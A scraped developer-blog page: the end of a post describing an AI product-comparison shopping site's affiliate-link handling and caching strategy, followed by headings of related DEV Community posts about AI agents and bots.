The AI doesn't just match keywords — it understands that "gaming laptop under $800 with RTX" means you want a laptop (not a case), with an NVIDIA RTX GPU, priced below $800.

Challenges I Faced

Canadian Data is Different
Google Shopping returns base64-encoded images for Canadian results instead of URLs. I almost filtered these out as "broken" before realizing they're perfectly valid data URIs that render fine.

Affiliate Link Complexity
Each retailer has a different affiliate URL format. Amazon uses tag=, eBay needs 5 different parameters (mkevt, mkcid, mkrid, campid, toolid), and some retailers don't have affiliate programs at all. Building a universal affiliate tag system that handles all of these was a fun challenge.

Keeping Costs Low
AI API calls add up fast. I implemented a 3-tier caching strategy:

In-memory cache (24-hour TTL) for instant hits
PostgreSQL cache (7-day TTL) for persistent storage
AI generation only when cache misses

This cut our AI costs by ~90%.

What's Next

Chrome extension (built, pending Web Store approval) — compare prices on any shopping site
More retailer integrations (Dell, HP, B&H Photo)
Price history tracking with charts
Mobile app

Try It Out

Check it out at shopsmartai.org — search for any product and see how it works. I'd love feedback from the dev community.

If you're interested in the technical details of any specific part (the AI search pipeline, the caching strategy, the affiliate system, or the Next.js architecture), let me know in the comments and I'll do a deep dive.

Built with Next.js, Node.js, PostgreSQL, and Gemini AI. Deployed on Vercel + Railway.

DEV Community: Ranjith Kumar Kondoju

An Oracle DBA builds AI: shipping Oracle 23ai RAG and an MCP server in a weekend

Why an Oracle DBA, of all people

What I built

Talk to EBS — RAG over Oracle E-Business Suite

mcp-oracle-dba — A Model Context Protocol server for Oracle

The five bugs that taught me the most

1. OrbStack's macOS port-forward NAT silently mangles Oracle TNS handshakes

2. Sandboxed macOS apps can't resolve *.orb.local

3. SELECT_CATALOG_ROLE replaces three explicit V$ grants

4. sqlparse tags CTE statements as Keyword.CTE, not DML

5. Prompt caching doesn't help on first turns. Only follow-ups.

What the numbers look like in practice

What I'd do differently if I started over

The DBA-to-AI take-away

Repos and links

I Built an AI That Argues With Itself About Anything

What I Built

Demo

Code

How I Used Gemma 4

Why three agents instead of one

The two modes (more detail)

The eight engineering problems

1. The page was not cross-origin isolated

2. WebGPU compile froze the tab for a minute

3. The worker flooded the main thread anyway

4. Wikipedia search returned nothing for verbose questions

5. The planner was spending 30 seconds on something a regex could do

6. Wikipedia gave facts but no opinions

7. Cloud mode was the next thing the project needed

8. Gemma 4 dumps its thinking into the response

What I want to be honest about

What I would build next

Thanks

How to Turn Any SaaS Into a Telegram Bot in 30 Minutes Using OpenClaw

The Problem Every SaaS Founder Has

What You Will Build

Why OpenClaw?

Step 1: Install Docker (2 min)

Step 2: Pull OpenClaw (2 min)

Step 3: Create a Telegram Bot (3 min)

Step 6: Start It Up (1 min)

Step 7: Test It (2 min)

Next Level Moves

Add custom skills (call your real API)

Multi channel in one line

shopsmartai / mealai-concierge

AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.

🍳 MealAI Concierge

What it does

Architecture

Quick Start

1. Prerequisites

2. Setup

See It Live

Clawdvent: An AI Dungeon Master That Lives in Your Discord - With Live Scene Art

What I Built

Demo

Real session screenshots:

Code

shopsmartai / clawdvent

AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.

🎲 Clawdvent — Your AI Dungeon Master in Discord

✨ Features

🚀 Quick Start

Prerequisites

How I Built It

The Stack

The Architecture

The Magic — SOUL.md

Multi-Agent Routing

Image Generation Flow

What I Learned

What's Next

Prize Category

Try It

shopsmartai / clawdvent

AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.

🎲 Clawdvent — Your AI Dungeon Master in Discord

2. Sandboxed macOS apps can't resolve `*.orb.local`

3. `SELECT_CATALOG_ROLE` replaces three explicit V$ grants

4. sqlparse tags CTE statements as `Keyword.CTE`, not `DML`